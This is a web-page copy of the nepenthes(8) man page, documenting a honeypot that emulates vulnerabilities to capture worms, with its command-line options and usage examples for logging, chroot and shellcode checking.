GSP
Quick Navigator

Search Site

Unix VPS
A - Starter
B - Basic
C - Preferred
D - Commercial
MPS - Dedicated
Previous VPSs
* Sign Up! *

Support
Contact Us
Online Help
Handbooks
Domain Status
Man Pages

FAQ
Virtual Servers
Pricing
Billing
Technical

Network
Facilities
Connectivity
Topology Map

Miscellaneous
Server Agreement
Year 2038
Credits
 

USA Flag

 

 

Man Pages


Manual Reference Pages  -  NEPENTHES (8)

NAME

nepenthes - finest collection -

CONTENTS

Synopsis
Description
Options
Examples
Files
Bugs
See Also

SYNOPSIS

nepenthes [OPTIONS]
nepenthes [OPTIONS] [PATH]
 

DESCRIPTION

By emulating widespread vulnerabilities Nepenthes is able to catch and store worms using these vulnerabilities. Furthermore you are able to determine the malware activity on a network by deploying a nepenthes sensor. The programm emulates different well known vulnerabilities waiting for malicious connections trying to exploit these. If a connection tries to exploit something, nepenthes tries to guess which exploit is going to be used. There are several different ways a exploitation can happen, the attacker can ask nepenthes to

* connect a provided ip & port offering a shell there (connectback) 
* bind a shell on a port (bindshell) 
* direct execute a shellcommand 
* provide a url from where to download a file and execute the file 
* use specific filetransferr mechanisms to transferr the file (link, blink, mydoom ...) 

If a shell is expected, bindshell or connectback shell, nepenthes will offer this shell to the attacker and fullfill the requested actions. In most cases there are two ways worms try to spread themselves using a shell,

tftp - trivial filetransfer protocoll using tftp.exe in Microsoft Windows. 
ftp - filetransfer protocoll using ftp.exe in Microsoft Windows. 

Nepenthes will parse the shell instructions and try to download the file, upon success the file will be stored.

OPTIONS

-c PATH, --config=PATH
  PATH to nepenthes.conf
-d PATTERN, --disk-log=PATTERN
  apply filter to console logging. PATTERN can consist of crit, warn, info, debug and spam, combine tags using , .
-f OPTIONS PATH, --file-check=OPTIONS PATH
  Use Nepenthes to check if a file or a directory of files in PATH contain known shellcodes. PATH can be a directory or multiple files. OPTIONS can be rmknown,rmnonop,nothing.
-h, --help
  show help
-H, --large-help
  show help with default values
-i, --info
  how to contact us
-k, --check-config
  check nepenthes.conf config for syntax errors
-l PATTERN, --log=PATTERN
  apply filter to console logging. PATTERN can consist of crit, warn, info, debug and spam, combine tags using , .
-L, --logging-help
  display help for -d and -l
-o, --no-color
  log without colors to console (does not work yet).
-r PATH, --chroot=PATH
  chroot to PATH
-R, --ringlog
  use ringlogger instead of filelogger
-u USER, --user=USER
  switch the user the process runs as USER must be a users name.
-g GROUP, --group=GROUP
  switch process group GROUP must be a groups name.
-v, --version
  show version
-w, --workingdir
  where shall the process live

EXAMPLES

nepenthes -d crit,warn,info
  start nepenthes and log only messaged with loglevel critical, warning and info to disk
nepenthes -u marshall -g mother
  start nepenthes and change to user marshall and group mother.
nepenthes -r /opt/nepenthes
  start nepenthes and chroot to /opt/nepenthes
nepenthes -u marshall -g mother -r /opt/nepenthes
  start nepenthes and change to user marshall and group mother and chroot to /opt/nepenthes
nepenthes -f rmknown,rmnonop,dononp /opt/nepenthes/var/hexdumps/
  check the directory /opt/nepenthes/var/hexdumps for known shellcodes, remove known shellcodes, remove shellcodes without nop slide, check shellcodes without nopslide.
nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
  check the files in the directory /opt/nepenthes/var/hexdumps and the files in /tmp/*.bin for known shellcodes, do nothing.

FILES

etc/nepenthes/nepenthes.conf
  nepenthes configuration file
lib/nepenthes/ nepenthes modules
etc/nepenthes/ nepenthes modules configuration files

BUGS

this manual is a pain
 

SEE ALSO

nepenthes.conf(5)

Search for    or go to Top of page |  Section 8 |  Main Index


nepenthes 0.1.3 NEPENTHES (8) 2005-11-18

Powered by GSP Visit the GSP FreeBSD Man Page Interface.
Output converted with manServer 1.07.